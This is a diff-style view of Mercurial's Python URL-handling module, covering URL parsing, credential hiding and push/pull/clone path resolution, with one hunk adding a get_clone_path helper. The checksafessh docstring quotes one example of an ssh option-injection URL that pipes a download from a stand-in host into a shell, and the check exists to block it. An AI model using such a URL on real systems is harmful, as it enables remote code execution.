107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
107 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
108 <url scheme: 'http', host: 'host', path: 'a?b#c'>
109
109
110 Empty path:
110 Empty path:
111
111
112 >>> url(b'')
112 >>> url(b'')
113 <url path: ''>
113 <url path: ''>
114 >>> url(b'#a')
114 >>> url(b'#a')
115 <url path: '', fragment: 'a'>
115 <url path: '', fragment: 'a'>
116 >>> url(b'http://host/')
116 >>> url(b'http://host/')
117 <url scheme: 'http', host: 'host', path: ''>
117 <url scheme: 'http', host: 'host', path: ''>
118 >>> url(b'http://host/#a')
118 >>> url(b'http://host/#a')
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
119 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
120
120
121 Only scheme:
121 Only scheme:
122
122
123 >>> url(b'http:')
123 >>> url(b'http:')
124 <url scheme: 'http'>
124 <url scheme: 'http'>
125 """
125 """
126
126
127 _safechars = b"!~*'()+"
127 _safechars = b"!~*'()+"
128 _safepchars = b"/!~*'()+:\\"
128 _safepchars = b"/!~*'()+:\\"
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
129 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
130
130
131 def __init__(self, path, parsequery=True, parsefragment=True):
131 def __init__(self, path, parsequery=True, parsefragment=True):
132 # type: (bytes, bool, bool) -> None
132 # type: (bytes, bool, bool) -> None
133 # We slowly chomp away at path until we have only the path left
133 # We slowly chomp away at path until we have only the path left
134 self.scheme = self.user = self.passwd = self.host = None
134 self.scheme = self.user = self.passwd = self.host = None
135 self.port = self.path = self.query = self.fragment = None
135 self.port = self.path = self.query = self.fragment = None
136 self._localpath = True
136 self._localpath = True
137 self._hostport = b''
137 self._hostport = b''
138 self._origpath = path
138 self._origpath = path
139
139
140 if parsefragment and b'#' in path:
140 if parsefragment and b'#' in path:
141 path, self.fragment = path.split(b'#', 1)
141 path, self.fragment = path.split(b'#', 1)
142
142
143 # special case for Windows drive letters and UNC paths
143 # special case for Windows drive letters and UNC paths
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
144 if hasdriveletter(path) or path.startswith(b'\\\\'):
145 self.path = path
145 self.path = path
146 return
146 return
147
147
148 # For compatibility reasons, we can't handle bundle paths as
148 # For compatibility reasons, we can't handle bundle paths as
149 # normal URLS
149 # normal URLS
150 if path.startswith(b'bundle:'):
150 if path.startswith(b'bundle:'):
151 self.scheme = b'bundle'
151 self.scheme = b'bundle'
152 path = path[7:]
152 path = path[7:]
153 if path.startswith(b'//'):
153 if path.startswith(b'//'):
154 path = path[2:]
154 path = path[2:]
155 self.path = path
155 self.path = path
156 return
156 return
157
157
158 if self._matchscheme(path):
158 if self._matchscheme(path):
159 parts = path.split(b':', 1)
159 parts = path.split(b':', 1)
160 if parts[0]:
160 if parts[0]:
161 self.scheme, path = parts
161 self.scheme, path = parts
162 self._localpath = False
162 self._localpath = False
163
163
164 if not path:
164 if not path:
165 path = None
165 path = None
166 if self._localpath:
166 if self._localpath:
167 self.path = b''
167 self.path = b''
168 return
168 return
169 else:
169 else:
170 if self._localpath:
170 if self._localpath:
171 self.path = path
171 self.path = path
172 return
172 return
173
173
174 if parsequery and b'?' in path:
174 if parsequery and b'?' in path:
175 path, self.query = path.split(b'?', 1)
175 path, self.query = path.split(b'?', 1)
176 if not path:
176 if not path:
177 path = None
177 path = None
178 if not self.query:
178 if not self.query:
179 self.query = None
179 self.query = None
180
180
181 # // is required to specify a host/authority
181 # // is required to specify a host/authority
182 if path and path.startswith(b'//'):
182 if path and path.startswith(b'//'):
183 parts = path[2:].split(b'/', 1)
183 parts = path[2:].split(b'/', 1)
184 if len(parts) > 1:
184 if len(parts) > 1:
185 self.host, path = parts
185 self.host, path = parts
186 else:
186 else:
187 self.host = parts[0]
187 self.host = parts[0]
188 path = None
188 path = None
189 if not self.host:
189 if not self.host:
190 self.host = None
190 self.host = None
191 # path of file:///d is /d
191 # path of file:///d is /d
192 # path of file:///d:/ is d:/, not /d:/
192 # path of file:///d:/ is d:/, not /d:/
193 if path and not hasdriveletter(path):
193 if path and not hasdriveletter(path):
194 path = b'/' + path
194 path = b'/' + path
195
195
196 if self.host and b'@' in self.host:
196 if self.host and b'@' in self.host:
197 self.user, self.host = self.host.rsplit(b'@', 1)
197 self.user, self.host = self.host.rsplit(b'@', 1)
198 if b':' in self.user:
198 if b':' in self.user:
199 self.user, self.passwd = self.user.split(b':', 1)
199 self.user, self.passwd = self.user.split(b':', 1)
200 if not self.host:
200 if not self.host:
201 self.host = None
201 self.host = None
202
202
203 # Don't split on colons in IPv6 addresses without ports
203 # Don't split on colons in IPv6 addresses without ports
204 if (
204 if (
205 self.host
205 self.host
206 and b':' in self.host
206 and b':' in self.host
207 and not (
207 and not (
208 self.host.startswith(b'[') and self.host.endswith(b']')
208 self.host.startswith(b'[') and self.host.endswith(b']')
209 )
209 )
210 ):
210 ):
211 self._hostport = self.host
211 self._hostport = self.host
212 self.host, self.port = self.host.rsplit(b':', 1)
212 self.host, self.port = self.host.rsplit(b':', 1)
213 if not self.host:
213 if not self.host:
214 self.host = None
214 self.host = None
215
215
216 if (
216 if (
217 self.host
217 self.host
218 and self.scheme == b'file'
218 and self.scheme == b'file'
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
219 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
220 ):
220 ):
221 raise error.Abort(
221 raise error.Abort(
222 _(b'file:// URLs can only refer to localhost')
222 _(b'file:// URLs can only refer to localhost')
223 )
223 )
224
224
225 self.path = path
225 self.path = path
226
226
227 # leave the query string escaped
227 # leave the query string escaped
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
228 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
229 v = getattr(self, a)
229 v = getattr(self, a)
230 if v is not None:
230 if v is not None:
231 setattr(self, a, urlreq.unquote(v))
231 setattr(self, a, urlreq.unquote(v))
232
232
233 def copy(self):
233 def copy(self):
234 u = url(b'temporary useless value')
234 u = url(b'temporary useless value')
235 u.path = self.path
235 u.path = self.path
236 u.scheme = self.scheme
236 u.scheme = self.scheme
237 u.user = self.user
237 u.user = self.user
238 u.passwd = self.passwd
238 u.passwd = self.passwd
239 u.host = self.host
239 u.host = self.host
240 u.path = self.path
240 u.path = self.path
241 u.query = self.query
241 u.query = self.query
242 u.fragment = self.fragment
242 u.fragment = self.fragment
243 u._localpath = self._localpath
243 u._localpath = self._localpath
244 u._hostport = self._hostport
244 u._hostport = self._hostport
245 u._origpath = self._origpath
245 u._origpath = self._origpath
246 return u
246 return u
247
247
248 @encoding.strmethod
248 @encoding.strmethod
249 def __repr__(self):
249 def __repr__(self):
250 attrs = []
250 attrs = []
251 for a in (
251 for a in (
252 b'scheme',
252 b'scheme',
253 b'user',
253 b'user',
254 b'passwd',
254 b'passwd',
255 b'host',
255 b'host',
256 b'port',
256 b'port',
257 b'path',
257 b'path',
258 b'query',
258 b'query',
259 b'fragment',
259 b'fragment',
260 ):
260 ):
261 v = getattr(self, a)
261 v = getattr(self, a)
262 if v is not None:
262 if v is not None:
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
263 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
264 return b'<url %s>' % b', '.join(attrs)
264 return b'<url %s>' % b', '.join(attrs)
265
265
266 def __bytes__(self):
266 def __bytes__(self):
267 r"""Join the URL's components back into a URL string.
267 r"""Join the URL's components back into a URL string.
268
268
269 Examples:
269 Examples:
270
270
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
271 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
272 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
273 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
274 'http://user:pw@host:80/?foo=bar&baz=42'
274 'http://user:pw@host:80/?foo=bar&baz=42'
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
275 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
276 'http://user:pw@host:80/?foo=bar%3dbaz'
276 'http://user:pw@host:80/?foo=bar%3dbaz'
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
277 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
278 'ssh://user:pw@[::1]:2200//home/joe#'
278 'ssh://user:pw@[::1]:2200//home/joe#'
279 >>> bytes(url(b'http://localhost:80//'))
279 >>> bytes(url(b'http://localhost:80//'))
280 'http://localhost:80//'
280 'http://localhost:80//'
281 >>> bytes(url(b'http://localhost:80/'))
281 >>> bytes(url(b'http://localhost:80/'))
282 'http://localhost:80/'
282 'http://localhost:80/'
283 >>> bytes(url(b'http://localhost:80'))
283 >>> bytes(url(b'http://localhost:80'))
284 'http://localhost:80/'
284 'http://localhost:80/'
285 >>> bytes(url(b'bundle:foo'))
285 >>> bytes(url(b'bundle:foo'))
286 'bundle:foo'
286 'bundle:foo'
287 >>> bytes(url(b'bundle://../foo'))
287 >>> bytes(url(b'bundle://../foo'))
288 'bundle:../foo'
288 'bundle:../foo'
289 >>> bytes(url(b'path'))
289 >>> bytes(url(b'path'))
290 'path'
290 'path'
291 >>> bytes(url(b'file:///tmp/foo/bar'))
291 >>> bytes(url(b'file:///tmp/foo/bar'))
292 'file:///tmp/foo/bar'
292 'file:///tmp/foo/bar'
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
293 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
294 'file:///c:/tmp/foo/bar'
294 'file:///c:/tmp/foo/bar'
295 >>> print(url(br'bundle:foo\bar'))
295 >>> print(url(br'bundle:foo\bar'))
296 bundle:foo\bar
296 bundle:foo\bar
297 >>> print(url(br'file:///D:\data\hg'))
297 >>> print(url(br'file:///D:\data\hg'))
298 file:///D:\data\hg
298 file:///D:\data\hg
299 """
299 """
300 if self._localpath:
300 if self._localpath:
301 s = self.path
301 s = self.path
302 if self.scheme == b'bundle':
302 if self.scheme == b'bundle':
303 s = b'bundle:' + s
303 s = b'bundle:' + s
304 if self.fragment:
304 if self.fragment:
305 s += b'#' + self.fragment
305 s += b'#' + self.fragment
306 return s
306 return s
307
307
308 s = self.scheme + b':'
308 s = self.scheme + b':'
309 if self.user or self.passwd or self.host:
309 if self.user or self.passwd or self.host:
310 s += b'//'
310 s += b'//'
311 elif self.scheme and (
311 elif self.scheme and (
312 not self.path
312 not self.path
313 or self.path.startswith(b'/')
313 or self.path.startswith(b'/')
314 or hasdriveletter(self.path)
314 or hasdriveletter(self.path)
315 ):
315 ):
316 s += b'//'
316 s += b'//'
317 if hasdriveletter(self.path):
317 if hasdriveletter(self.path):
318 s += b'/'
318 s += b'/'
319 if self.user:
319 if self.user:
320 s += urlreq.quote(self.user, safe=self._safechars)
320 s += urlreq.quote(self.user, safe=self._safechars)
321 if self.passwd:
321 if self.passwd:
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
322 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
323 if self.user or self.passwd:
323 if self.user or self.passwd:
324 s += b'@'
324 s += b'@'
325 if self.host:
325 if self.host:
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
326 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
327 s += urlreq.quote(self.host)
327 s += urlreq.quote(self.host)
328 else:
328 else:
329 s += self.host
329 s += self.host
330 if self.port:
330 if self.port:
331 s += b':' + urlreq.quote(self.port)
331 s += b':' + urlreq.quote(self.port)
332 if self.host:
332 if self.host:
333 s += b'/'
333 s += b'/'
334 if self.path:
334 if self.path:
335 # TODO: similar to the query string, we should not unescape the
335 # TODO: similar to the query string, we should not unescape the
336 # path when we store it, the path might contain '%2f' = '/',
336 # path when we store it, the path might contain '%2f' = '/',
337 # which we should *not* escape.
337 # which we should *not* escape.
338 s += urlreq.quote(self.path, safe=self._safepchars)
338 s += urlreq.quote(self.path, safe=self._safepchars)
339 if self.query:
339 if self.query:
340 # we store the query in escaped form.
340 # we store the query in escaped form.
341 s += b'?' + self.query
341 s += b'?' + self.query
342 if self.fragment is not None:
342 if self.fragment is not None:
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
343 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
344 return s
344 return s
345
345
346 __str__ = encoding.strmethod(__bytes__)
346 __str__ = encoding.strmethod(__bytes__)
347
347
348 def authinfo(self):
348 def authinfo(self):
349 user, passwd = self.user, self.passwd
349 user, passwd = self.user, self.passwd
350 try:
350 try:
351 self.user, self.passwd = None, None
351 self.user, self.passwd = None, None
352 s = bytes(self)
352 s = bytes(self)
353 finally:
353 finally:
354 self.user, self.passwd = user, passwd
354 self.user, self.passwd = user, passwd
355 if not self.user:
355 if not self.user:
356 return (s, None)
356 return (s, None)
357 # authinfo[1] is passed to urllib2 password manager, and its
357 # authinfo[1] is passed to urllib2 password manager, and its
358 # URIs must not contain credentials. The host is passed in the
358 # URIs must not contain credentials. The host is passed in the
359 # URIs list because Python < 2.4.3 uses only that to search for
359 # URIs list because Python < 2.4.3 uses only that to search for
360 # a password.
360 # a password.
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
361 return (s, (None, (s, self.host), self.user, self.passwd or b''))
362
362
363 def isabs(self):
363 def isabs(self):
364 if self.scheme and self.scheme != b'file':
364 if self.scheme and self.scheme != b'file':
365 return True # remote URL
365 return True # remote URL
366 if hasdriveletter(self.path):
366 if hasdriveletter(self.path):
367 return True # absolute for our purposes - can't be joined()
367 return True # absolute for our purposes - can't be joined()
368 if self.path.startswith(br'\\'):
368 if self.path.startswith(br'\\'):
369 return True # Windows UNC path
369 return True # Windows UNC path
370 if self.path.startswith(b'/'):
370 if self.path.startswith(b'/'):
371 return True # POSIX-style
371 return True # POSIX-style
372 return False
372 return False
373
373
374 def localpath(self):
374 def localpath(self):
375 # type: () -> bytes
375 # type: () -> bytes
376 if self.scheme == b'file' or self.scheme == b'bundle':
376 if self.scheme == b'file' or self.scheme == b'bundle':
377 path = self.path or b'/'
377 path = self.path or b'/'
378 # For Windows, we need to promote hosts containing drive
378 # For Windows, we need to promote hosts containing drive
379 # letters to paths with drive letters.
379 # letters to paths with drive letters.
380 if hasdriveletter(self._hostport):
380 if hasdriveletter(self._hostport):
381 path = self._hostport + b'/' + self.path
381 path = self._hostport + b'/' + self.path
382 elif (
382 elif (
383 self.host is not None and self.path and not hasdriveletter(path)
383 self.host is not None and self.path and not hasdriveletter(path)
384 ):
384 ):
385 path = b'/' + path
385 path = b'/' + path
386 return path
386 return path
387 return self._origpath
387 return self._origpath
388
388
389 def islocal(self):
389 def islocal(self):
390 '''whether localpath will return something that posixfile can open'''
390 '''whether localpath will return something that posixfile can open'''
391 return (
391 return (
392 not self.scheme
392 not self.scheme
393 or self.scheme == b'file'
393 or self.scheme == b'file'
394 or self.scheme == b'bundle'
394 or self.scheme == b'bundle'
395 )
395 )
396
396
397
397
398 def hasscheme(path):
398 def hasscheme(path):
399 # type: (bytes) -> bool
399 # type: (bytes) -> bool
400 return bool(url(path).scheme) # cast to help pytype
400 return bool(url(path).scheme) # cast to help pytype
401
401
402
402
403 def hasdriveletter(path):
403 def hasdriveletter(path):
404 # type: (bytes) -> bool
404 # type: (bytes) -> bool
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
405 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
406
406
407
407
408 def urllocalpath(path):
408 def urllocalpath(path):
409 # type: (bytes) -> bytes
409 # type: (bytes) -> bytes
410 return url(path, parsequery=False, parsefragment=False).localpath()
410 return url(path, parsequery=False, parsefragment=False).localpath()
411
411
412
412
413 def checksafessh(path):
413 def checksafessh(path):
414 # type: (bytes) -> None
414 # type: (bytes) -> None
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
415 """check if a path / url is a potentially unsafe ssh exploit (SEC)
416
416
417 This is a sanity check for ssh urls. ssh will parse the first item as
417 This is a sanity check for ssh urls. ssh will parse the first item as
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
418 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
419 Let's prevent these potentially exploited urls entirely and warn the
419 Let's prevent these potentially exploited urls entirely and warn the
420 user.
420 user.
421
421
422 Raises an error.Abort when the url is unsafe.
422 Raises an error.Abort when the url is unsafe.
423 """
423 """
424 path = urlreq.unquote(path)
424 path = urlreq.unquote(path)
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
425 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
426 raise error.Abort(
426 raise error.Abort(
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
427 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
428 )
428 )
429
429
430
430
431 def hidepassword(u):
431 def hidepassword(u):
432 # type: (bytes) -> bytes
432 # type: (bytes) -> bytes
433 '''hide user credential in a url string'''
433 '''hide user credential in a url string'''
434 u = url(u)
434 u = url(u)
435 if u.passwd:
435 if u.passwd:
436 u.passwd = b'***'
436 u.passwd = b'***'
437 return bytes(u)
437 return bytes(u)
438
438
439
439
440 def removeauth(u):
440 def removeauth(u):
441 # type: (bytes) -> bytes
441 # type: (bytes) -> bytes
442 '''remove all authentication information from a url string'''
442 '''remove all authentication information from a url string'''
443 u = url(u)
443 u = url(u)
444 u.user = u.passwd = None
444 u.user = u.passwd = None
445 return bytes(u)
445 return bytes(u)
446
446
447
447
448 def get_push_paths(repo, ui, dests):
448 def get_push_paths(repo, ui, dests):
449 """yields all the `path` selected as push destination by `dests`"""
449 """yields all the `path` selected as push destination by `dests`"""
450 if not dests:
450 if not dests:
451 if b'default-push' in ui.paths:
451 if b'default-push' in ui.paths:
452 yield ui.paths[b'default-push']
452 yield ui.paths[b'default-push']
453 elif b'default' in ui.paths:
453 elif b'default' in ui.paths:
454 yield ui.paths[b'default']
454 yield ui.paths[b'default']
455 else:
455 else:
456 raise error.ConfigError(
456 raise error.ConfigError(
457 _(b'default repository not configured!'),
457 _(b'default repository not configured!'),
458 hint=_(b"see 'hg help config.paths'"),
458 hint=_(b"see 'hg help config.paths'"),
459 )
459 )
460 else:
460 else:
461 for dest in dests:
461 for dest in dests:
462 yield ui.getpath(dest)
462 yield ui.getpath(dest)
463
463
464
464
465 def get_pull_paths(repo, ui, sources, default_branches=()):
465 def get_pull_paths(repo, ui, sources, default_branches=()):
466 """yields all the `(path, branch)` selected as pull source by `sources`"""
466 """yields all the `(path, branch)` selected as pull source by `sources`"""
467 if not sources:
467 if not sources:
468 sources = [b'default']
468 sources = [b'default']
469 for source in sources:
469 for source in sources:
470 url = ui.expandpath(source)
470 url = ui.expandpath(source)
471 yield parseurl(url, default_branches)
471 yield parseurl(url, default_branches)
472
472
473
473
474 def get_clone_path(ui, source, default_branches=()):
475 """return the `(origsource, path, branch)` selected as clone source"""
476 url = ui.expandpath(source)
477 path, branch = parseurl(url, default_branches)
478 return url, path, branch
479
480
474 def parseurl(path, branches=None):
481 def parseurl(path, branches=None):
475 '''parse url#branch, returning (url, (branch, branches))'''
482 '''parse url#branch, returning (url, (branch, branches))'''
476 u = url(path)
483 u = url(path)
477 branch = None
484 branch = None
478 if u.fragment:
485 if u.fragment:
479 branch = u.fragment
486 branch = u.fragment
480 u.fragment = None
487 u.fragment = None
481 return bytes(u), (branch, branches or [])
488 return bytes(u), (branch, branches or [])
482
489
483
490
484 class paths(dict):
491 class paths(dict):
485 """Represents a collection of paths and their configs.
492 """Represents a collection of paths and their configs.
486
493
487 Data is initially derived from ui instances and the config files they have
494 Data is initially derived from ui instances and the config files they have
488 loaded.
495 loaded.
489 """
496 """
490
497
491 def __init__(self, ui):
498 def __init__(self, ui):
492 dict.__init__(self)
499 dict.__init__(self)
493
500
494 for name, loc in ui.configitems(b'paths', ignoresub=True):
501 for name, loc in ui.configitems(b'paths', ignoresub=True):
495 # No location is the same as not existing.
502 # No location is the same as not existing.
496 if not loc:
503 if not loc:
497 continue
504 continue
498 loc, sub_opts = ui.configsuboptions(b'paths', name)
505 loc, sub_opts = ui.configsuboptions(b'paths', name)
499 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
506 self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts)
500
507
501 for name, p in sorted(self.items()):
508 for name, p in sorted(self.items()):
502 p.chain_path(ui, self)
509 p.chain_path(ui, self)
503
510
504 def getpath(self, ui, name, default=None):
511 def getpath(self, ui, name, default=None):
505 """Return a ``path`` from a string, falling back to default.
512 """Return a ``path`` from a string, falling back to default.
506
513
507 ``name`` can be a named path or locations. Locations are filesystem
514 ``name`` can be a named path or locations. Locations are filesystem
508 paths or URIs.
515 paths or URIs.
509
516
510 Returns None if ``name`` is not a registered path, a URI, or a local
517 Returns None if ``name`` is not a registered path, a URI, or a local
511 path to a repo.
518 path to a repo.
512 """
519 """
513 # Only fall back to default if no path was requested.
520 # Only fall back to default if no path was requested.
514 if name is None:
521 if name is None:
515 if not default:
522 if not default:
516 default = ()
523 default = ()
517 elif not isinstance(default, (tuple, list)):
524 elif not isinstance(default, (tuple, list)):
518 default = (default,)
525 default = (default,)
519 for k in default:
526 for k in default:
520 try:
527 try:
521 return self[k]
528 return self[k]
522 except KeyError:
529 except KeyError:
523 continue
530 continue
524 return None
531 return None
525
532
526 # Most likely empty string.
533 # Most likely empty string.
527 # This may need to raise in the future.
534 # This may need to raise in the future.
528 if not name:
535 if not name:
529 return None
536 return None
530
537
531 try:
538 try:
532 return self[name]
539 return self[name]
533 except KeyError:
540 except KeyError:
534 # Try to resolve as a local path or URI.
541 # Try to resolve as a local path or URI.
535 try:
542 try:
536 # we pass the ui instance are warning might need to be issued
543 # we pass the ui instance are warning might need to be issued
537 return path(ui, None, rawloc=name)
544 return path(ui, None, rawloc=name)
538 except ValueError:
545 except ValueError:
539 raise error.RepoError(_(b'repository %s does not exist') % name)
546 raise error.RepoError(_(b'repository %s does not exist') % name)
540
547
541
548
542 _pathsuboptions = {}
549 _pathsuboptions = {}
543
550
544
551
545 def pathsuboption(option, attr):
552 def pathsuboption(option, attr):
546 """Decorator used to declare a path sub-option.
553 """Decorator used to declare a path sub-option.
547
554
548 Arguments are the sub-option name and the attribute it should set on
555 Arguments are the sub-option name and the attribute it should set on
549 ``path`` instances.
556 ``path`` instances.
550
557
551 The decorated function will receive as arguments a ``ui`` instance,
558 The decorated function will receive as arguments a ``ui`` instance,
552 ``path`` instance, and the string value of this option from the config.
559 ``path`` instance, and the string value of this option from the config.
553 The function should return the value that will be set on the ``path``
560 The function should return the value that will be set on the ``path``
554 instance.
561 instance.
555
562
556 This decorator can be used to perform additional verification of
563 This decorator can be used to perform additional verification of
557 sub-options and to change the type of sub-options.
564 sub-options and to change the type of sub-options.
558 """
565 """
559
566
560 def register(func):
567 def register(func):
561 _pathsuboptions[option] = (attr, func)
568 _pathsuboptions[option] = (attr, func)
562 return func
569 return func
563
570
564 return register
571 return register
565
572
566
573
567 @pathsuboption(b'pushurl', b'pushloc')
574 @pathsuboption(b'pushurl', b'pushloc')
568 def pushurlpathoption(ui, path, value):
575 def pushurlpathoption(ui, path, value):
569 u = url(value)
576 u = url(value)
570 # Actually require a URL.
577 # Actually require a URL.
571 if not u.scheme:
578 if not u.scheme:
572 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
579 ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
573 return None
580 return None
574
581
575 # Don't support the #foo syntax in the push URL to declare branch to
582 # Don't support the #foo syntax in the push URL to declare branch to
576 # push.
583 # push.
577 if u.fragment:
584 if u.fragment:
578 ui.warn(
585 ui.warn(
579 _(
586 _(
580 b'("#fragment" in paths.%s:pushurl not supported; '
587 b'("#fragment" in paths.%s:pushurl not supported; '
581 b'ignoring)\n'
588 b'ignoring)\n'
582 )
589 )
583 % path.name
590 % path.name
584 )
591 )
585 u.fragment = None
592 u.fragment = None
586
593
587 return bytes(u)
594 return bytes(u)
588
595
589
596
590 @pathsuboption(b'pushrev', b'pushrev')
597 @pathsuboption(b'pushrev', b'pushrev')
591 def pushrevpathoption(ui, path, value):
598 def pushrevpathoption(ui, path, value):
592 return value
599 return value
593
600
594
601
595 class path(object):
602 class path(object):
596 """Represents an individual path and its configuration."""
603 """Represents an individual path and its configuration."""
597
604
598 def __init__(self, ui, name, rawloc=None, suboptions=None):
605 def __init__(self, ui, name, rawloc=None, suboptions=None):
599 """Construct a path from its config options.
606 """Construct a path from its config options.
600
607
601 ``ui`` is the ``ui`` instance the path is coming from.
608 ``ui`` is the ``ui`` instance the path is coming from.
602 ``name`` is the symbolic name of the path.
609 ``name`` is the symbolic name of the path.
603 ``rawloc`` is the raw location, as defined in the config.
610 ``rawloc`` is the raw location, as defined in the config.
604 ``pushloc`` is the raw locations pushes should be made to.
611 ``pushloc`` is the raw locations pushes should be made to.
605
612
606 If ``name`` is not defined, we require that the location be a) a local
613 If ``name`` is not defined, we require that the location be a) a local
607 filesystem path with a .hg directory or b) a URL. If not,
614 filesystem path with a .hg directory or b) a URL. If not,
608 ``ValueError`` is raised.
615 ``ValueError`` is raised.
609 """
616 """
610 if not rawloc:
617 if not rawloc:
611 raise ValueError(b'rawloc must be defined')
618 raise ValueError(b'rawloc must be defined')
612
619
613 # Locations may define branches via syntax <base>#<branch>.
620 # Locations may define branches via syntax <base>#<branch>.
614 u = url(rawloc)
621 u = url(rawloc)
615 branch = None
622 branch = None
616 if u.fragment:
623 if u.fragment:
617 branch = u.fragment
624 branch = u.fragment
618 u.fragment = None
625 u.fragment = None
619
626
620 self.url = u
627 self.url = u
621 # the url from the config/command line before dealing with `path://`
628 # the url from the config/command line before dealing with `path://`
622 self.raw_url = u.copy()
629 self.raw_url = u.copy()
623 self.branch = branch
630 self.branch = branch
624
631
625 self.name = name
632 self.name = name
626 self.rawloc = rawloc
633 self.rawloc = rawloc
627 self.loc = b'%s' % u
634 self.loc = b'%s' % u
628
635
629 self._validate_path()
636 self._validate_path()
630
637
631 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
638 _path, sub_opts = ui.configsuboptions(b'paths', b'*')
632 self._own_sub_opts = {}
639 self._own_sub_opts = {}
633 if suboptions is not None:
640 if suboptions is not None:
634 self._own_sub_opts = suboptions.copy()
641 self._own_sub_opts = suboptions.copy()
635 sub_opts.update(suboptions)
642 sub_opts.update(suboptions)
636 self._all_sub_opts = sub_opts.copy()
643 self._all_sub_opts = sub_opts.copy()
637
644
638 self._apply_suboptions(ui, sub_opts)
645 self._apply_suboptions(ui, sub_opts)
639
646
640 def chain_path(self, ui, paths):
647 def chain_path(self, ui, paths):
641 if self.url.scheme == b'path':
648 if self.url.scheme == b'path':
642 assert self.url.path is None
649 assert self.url.path is None
643 try:
650 try:
644 subpath = paths[self.url.host]
651 subpath = paths[self.url.host]
645 except KeyError:
652 except KeyError:
646 m = _(b'cannot use `%s`, "%s" is not a known path')
653 m = _(b'cannot use `%s`, "%s" is not a known path')
647 m %= (self.rawloc, self.url.host)
654 m %= (self.rawloc, self.url.host)
648 raise error.Abort(m)
655 raise error.Abort(m)
649 if subpath.raw_url.scheme == b'path':
656 if subpath.raw_url.scheme == b'path':
650 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
657 m = _(b'cannot use `%s`, "%s" is also defined as a `path://`')
651 m %= (self.rawloc, self.url.host)
658 m %= (self.rawloc, self.url.host)
652 raise error.Abort(m)
659 raise error.Abort(m)
653 self.url = subpath.url
660 self.url = subpath.url
654 self.rawloc = subpath.rawloc
661 self.rawloc = subpath.rawloc
655 self.loc = subpath.loc
662 self.loc = subpath.loc
656 if self.branch is None:
663 if self.branch is None:
657 self.branch = subpath.branch
664 self.branch = subpath.branch
658 else:
665 else:
659 base = self.rawloc.rsplit(b'#', 1)[0]
666 base = self.rawloc.rsplit(b'#', 1)[0]
660 self.rawloc = b'%s#%s' % (base, self.branch)
667 self.rawloc = b'%s#%s' % (base, self.branch)
661 suboptions = subpath._all_sub_opts.copy()
668 suboptions = subpath._all_sub_opts.copy()
662 suboptions.update(self._own_sub_opts)
669 suboptions.update(self._own_sub_opts)
663 self._apply_suboptions(ui, suboptions)
670 self._apply_suboptions(ui, suboptions)
664
671
665 def _validate_path(self):
672 def _validate_path(self):
666 # When given a raw location but not a symbolic name, validate the
673 # When given a raw location but not a symbolic name, validate the
667 # location is valid.
674 # location is valid.
668 if (
675 if (
669 not self.name
676 not self.name
670 and not self.url.scheme
677 and not self.url.scheme
671 and not self._isvalidlocalpath(self.loc)
678 and not self._isvalidlocalpath(self.loc)
672 ):
679 ):
673 raise ValueError(
680 raise ValueError(
674 b'location is not a URL or path to a local '
681 b'location is not a URL or path to a local '
675 b'repo: %s' % self.rawloc
682 b'repo: %s' % self.rawloc
676 )
683 )
677
684
678 def _apply_suboptions(self, ui, sub_options):
685 def _apply_suboptions(self, ui, sub_options):
679 # Now process the sub-options. If a sub-option is registered, its
686 # Now process the sub-options. If a sub-option is registered, its
680 # attribute will always be present. The value will be None if there
687 # attribute will always be present. The value will be None if there
681 # was no valid sub-option.
688 # was no valid sub-option.
682 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
689 for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions):
683 if suboption not in sub_options:
690 if suboption not in sub_options:
684 setattr(self, attr, None)
